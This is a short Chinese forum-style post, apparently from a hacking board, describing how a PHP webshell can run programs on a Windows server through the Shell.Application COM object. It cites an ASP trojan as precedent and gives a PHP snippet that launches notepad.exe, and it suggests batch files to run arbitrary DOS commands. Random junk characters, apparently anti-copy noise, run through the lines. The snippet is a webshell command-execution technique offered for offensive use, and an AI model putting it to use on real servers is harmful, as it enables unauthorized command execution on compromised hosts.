关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。; \6 @" y1 f6 k7 D/ c" h0 K
# C/ c! {* A, D: [今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法7 f7 a$ X- ]9 s8 Z% j; C# a0 |
* m; n1 Y0 j& N
<?php
, e7 o! k% j) J2 e+ C" B$wsh = new COM('Shell.Application') or die("Shell.Application");
) ?# y$ z. v- Q8 h' i $exec = $wsh->open("c:\\windows\\system32\\notepad.exe");3 }/ q9 ~' {) {# @ X
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
* e# o: i4 N2 T& }. l6 q?>' p) |6 R( M. w' L. ]$ ]
- H! M! E' l, I5 v( y# Q1 @6 s
xp+APMServ5.2.0测试通过。
7 c( T. N$ k! y$ A) j1 T |